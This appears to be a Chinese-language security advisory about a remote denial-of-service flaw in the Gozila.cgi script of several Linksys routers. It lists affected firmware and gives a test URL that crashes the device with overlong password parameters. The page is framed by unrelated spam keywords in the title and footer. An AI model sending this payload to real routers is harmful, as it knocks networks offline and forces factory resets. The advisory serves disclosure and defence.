国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

多種Linksys路由器Gozila.cgi遠(yuǎn)程拒絕服務(wù)漏洞
2005-08-10   


信息提供:

安全公告(或線索)提供熱線:51cto.editor@gmail.com

漏洞類別:

遠(yuǎn)程拒絕服務(wù)漏洞

攻擊類型:

遠(yuǎn)程攻擊

發(fā)布日期:

2004-06-03

更新日期:

2004-06-08

受影響系統(tǒng):

Linksys EtherFast BEFSR41 Router 1.44
Linksys EtherFast BEFSR41 Router 1.43.3
Linksys EtherFast BEFSR41 Router 1.43
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFSR41 Router 1.41
Linksys EtherFast BEFSR41 Router 1.40.2
Linksys EtherFast BEFSR41 Router 1.39
Linksys EtherFast BEFSR41 Router 1.38
Linksys EtherFast BEFSR41 Router 1.37
Linksys EtherFast BEFSR41 Router 1.36
Linksys EtherFast BEFSR41 Router 1.35
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSR11 Router 1.43.3
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSR11 Router 1.41
Linksys EtherFast BEFSR11 Router 1.40.2
Linksys EtherFast BEFSRU31 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.43.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.41
Linksys EtherFast BEFSRU31 Router 1.40.2
Linksys BEFSX41 1.45.3
Linksys BEFSX41 1.44.3
Linksys BEFSX41 1.44
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys BEFSX41 1.42.7

安全系統(tǒng):

漏洞報(bào)告人:

b0f

漏洞描述:

BUGTRAQ  ID: 10453
Linksys擁有多種網(wǎng)絡(luò)設(shè)備產(chǎn)品線。
多種Linksys路由器包含的Gozila.cgi腳本未能正確處理用戶提交的參數(shù),遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)設(shè)備進(jìn)行拒絕服務(wù)攻擊。
如果提交2條超長字符串給Gozila.cgi腳本的sysPasswd和sysPasswdConfirm參數(shù),會(huì)導(dǎo)致路由器丟棄所有當(dāng)前連接,需要使用reset按鈕來恢復(fù)出廠設(shè)置。
攻擊者可以構(gòu)建WEB頁或發(fā)送惡意HTML形式EMAIL給目標(biāo)用戶。

測試方法:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

解決方法:

目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序,我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本:
http://www.linksys.com



熱詞搜索:

上一篇:實(shí)例講解:BGP配置五大注意事項(xiàng)
下一篇:輕松9步加強(qiáng)路由器安全

分享到: 收藏
主站蜘蛛池模板: 安多县| 四平市| 连平县| 阜宁县| 思茅市| 临澧县| 新沂市| 上蔡县| 体育| 五莲县| 仙桃市| 黔西县| 麦盖提县| 伊宁市| 崇州市| 沂南县| 永福县| 都安| 佛坪县| 石景山区| 堆龙德庆县| 吴川市| 东乌珠穆沁旗| 宜君县| 山西省| 合山市| 定陶县| 惠州市| 新民市| 米脂县| 南京市| 中宁县| 临朐县| 江源县| 融水| 铜梁县| 建湖县| 永兴县| 广宁县| 姚安县| 正安县|